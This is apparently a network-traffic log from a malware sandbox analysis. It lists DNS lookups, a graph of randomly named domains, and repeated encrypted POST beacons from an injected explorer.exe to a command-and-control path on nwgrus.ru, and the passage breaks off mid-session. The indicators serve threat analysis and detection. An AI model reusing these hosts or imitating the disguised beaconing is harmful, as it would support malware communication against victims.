Oct 3, 2024 12:27:24.379808903 CEST	57666	53	192.168.2.4	1.1.1.1
Oct 3, 2024 12:27:25.386127949 CEST	57666	53	192.168.2.4	1.1.1.1
Oct 3, 2024 12:27:25.537017107 CEST	53	57666	1.1.1.1	192.168.2.4
Oct 3, 2024 12:27:25.537058115 CEST	53	57666	1.1.1.1	192.168.2.4
Oct 3, 2024 12:27:25.537086964 CEST	53	57666	1.1.1.1	192.168.2.4
Oct 3, 2024 12:28:41.761816025 CEST	54762	53	192.168.2.4	1.1.1.1
Oct 3, 2024 12:28:41.813981056 CEST	53	54762	1.1.1.1	192.168.2.4
Oct 3, 2024 12:30:08.033876896 CEST	62941	53	192.168.2.4	1.1.1.1
Oct 3, 2024 12:30:09.070255995 CEST	62941	53	192.168.2.4	1.1.1.1
Oct 3, 2024 12:30:10.058176041 CEST	62941	53	192.168.2.4	1.1.1.1
Oct 3, 2024 12:30:10.969168901 CEST	53	62941	1.1.1.1	192.168.2.4
Oct 3, 2024 12:30:10.969219923 CEST	53	62941	1.1.1.1	192.168.2.4
Oct 3, 2024 12:30:10.969249010 CEST	53	62941	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 3, 2024 12:27:23.361846924 CEST	192.168.2.4	1.1.1.1	0x6a1c	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:24.379808903 CEST	192.168.2.4	1.1.1.1	0x6a1c	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.386127949 CEST	192.168.2.4	1.1.1.1	0x6a1c	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:28:41.761816025 CEST	192.168.2.4	1.1.1.1	0xf081	Standard query (0)	calvinandhalls.com	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:08.033876896 CEST	192.168.2.4	1.1.1.1	0x85ee	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:09.070255995 CEST	192.168.2.4	1.1.1.1	0x85ee	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.058176041 CEST	192.168.2.4	1.1.1.1	0x85ee	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 3, 2024 12:27:18.638269901 CEST	1.1.1.1	192.168.2.4	0xca4e	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:18.638269901 CEST	1.1.1.1	192.168.2.4	0xca4e	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:20.020610094 CEST	1.1.1.1	192.168.2.4	0xf74e	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 3, 2024 12:27:20.020610094 CEST	1.1.1.1	192.168.2.4	0xf74e	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537017107 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		58.151.148.90	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537017107 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		185.12.79.25	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537017107 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		93.118.137.82	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537017107 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		105.197.97.247	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537017107 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		95.86.30.3	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537017107 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		109.175.29.39	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537017107 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		130.204.29.121	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537017107 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		187.211.212.67	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537017107 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		190.219.117.240	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537017107 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		190.220.21.28	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537058115 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		58.151.148.90	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537058115 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		185.12.79.25	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537058115 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		93.118.137.82	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537058115 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		105.197.97.247	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537058115 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		95.86.30.3	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537058115 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		109.175.29.39	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537058115 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		130.204.29.121	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537058115 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		187.211.212.67	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537058115 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		190.219.117.240	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537058115 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		190.220.21.28	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537086964 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		58.151.148.90	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537086964 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		185.12.79.25	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537086964 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		93.118.137.82	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537086964 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		105.197.97.247	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537086964 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		95.86.30.3	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537086964 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		109.175.29.39	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537086964 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		130.204.29.121	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537086964 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		187.211.212.67	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537086964 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		190.219.117.240	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:27:25.537086964 CEST	1.1.1.1	192.168.2.4	0x6a1c	No error (0)	nwgrus.ru		190.220.21.28	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:28:41.813981056 CEST	1.1.1.1	192.168.2.4	0xf081	No error (0)	calvinandhalls.com		23.145.40.162	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969168901 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		109.175.29.39	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969168901 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		190.146.112.188	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969168901 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		180.75.11.133	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969168901 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		211.171.233.126	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969168901 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969168901 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		130.204.29.121	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969168901 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		196.189.156.245	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969168901 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		175.119.10.231	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969168901 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		78.89.199.216	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969168901 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		181.52.122.51	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969219923 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		109.175.29.39	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969219923 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		190.146.112.188	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969219923 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		180.75.11.133	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969219923 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		211.171.233.126	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969219923 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969219923 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		130.204.29.121	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969219923 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		196.189.156.245	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969219923 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		175.119.10.231	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969219923 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		78.89.199.216	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969219923 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		181.52.122.51	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969249010 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		109.175.29.39	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969249010 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		190.146.112.188	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969249010 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		180.75.11.133	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969249010 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		211.171.233.126	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969249010 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969249010 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		130.204.29.121	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969249010 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		196.189.156.245	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969249010 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		175.119.10.231	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969249010 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		78.89.199.216	A (IP address)	IN (0x0001)	false
Oct 3, 2024 12:30:10.969249010 CEST	1.1.1.1	192.168.2.4	0x85ee	No error (0)	nwgrus.ru		181.52.122.51	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

23.145.40.164

https:

calvinandhalls.com

yvmmviecnxldpero.com

nwgrus.ru

fmehaoiwwenqht.net

pmvrpbcqomr.org

ehjasruwjmcyiyc.com

mabsoalepkufuc.com

wlihjqaglis.com

djgtchksmne.com

jrsqrkoonpvkf.com

pqllteniaumhpux.net

ksbeipjuadnqvhne.org

ikkkpskbtojtajm.com

tlcaywkjpltapmg.com

ljdtqpdqnfgadl.com

fmsbxuxqcel.net

sjpwecfehtwlg.com

vvymdudugxqyqgd.net

vctlwttuihixctye.org

qkabdlcselvepu.net

fboiokwqifnpfwwg.net

cjlnjwyjoxyuf.org

jvksadufkdlihaeq.net

ricjpvrheenoi.com

uobogpxbvskdl.net

vwmsjsqvwuhba.org

kskrxgkqoed.net

euceyfvfmeh.net

qptrydkvolka.org

kaqmpmaijfnk.net

gyvqqphlebcxdpkv.com

ljhchdbaaaxer.org

gjsnmktycknrotm.org

gtnnfkxyrnmdua.com

gjxqibcjarykr.com

lwriihoulvmts.org

nfjjiuyrybf.net

xtbardaliciv.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:27:25.547517061 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yvmmviecnxldpero.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 271 Host: nwgrus.ru
Oct 3, 2024 12:27:25.547517061 CEST	271	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 77 1f a5 a4 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA .[k,vuwHyr{b\AjUhB1aC2VmER)EaT}hHd*g%U2jj_>Y460wuU@\|-b,+
Oct 3, 2024 12:27:27.326905966 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:27:26 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 86 ea Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:27:27.337848902 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fmehaoiwwenqht.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 169 Host: nwgrus.ru
Oct 3, 2024 12:27:27.337883949 CEST	169	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 77 41 d6 89 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vuwAyLnrjRgQ]6xr@ND[G`5?<-Fx<55K_A
Oct 3, 2024 12:27:30.072880030 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:27:29 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:27:30.082432032 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pmvrpbcqomr.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 180 Host: nwgrus.ru
Oct 3, 2024 12:27:30.082432032 CEST	180	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 6e 28 ca 93 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vun(T~tnCSvl;J,tm\9MEmSGUc(??/mysW8
Oct 3, 2024 12:27:32.842261076 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:27:32 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:27:32.850625038 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ehjasruwjmcyiyc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 188 Host: nwgrus.ru
Oct 3, 2024 12:27:32.850650072 CEST	188	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 31 45 de f5 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vu1EQ@nAu<6*#Mk1_-OER$%F3cw%3y]9](']
Oct 3, 2024 12:27:34.344331026 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:27:34 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:27:34.353441000 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mabsoalepkufuc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 123 Host: nwgrus.ru
Oct 3, 2024 12:27:34.353477001 CEST	123	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 41 3d d3 9c Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vuA=`MSv}s8~26Z?
Oct 3, 2024 12:27:37.884989977 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:27:35 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:27:37.903688908 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wlihjqaglis.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 322 Host: nwgrus.ru
Oct 3, 2024 12:27:37.903723955 CEST	322	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 74 44 b0 a4 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vutDKKn\|c(M^k;ff1Yl"GQRLZI T[LLLY`&YbsV/kA]t3nzd3
Oct 3, 2024 12:27:39.642565966 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:27:39 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:27:39.650537014 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://djgtchksmne.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 133 Host: nwgrus.ru
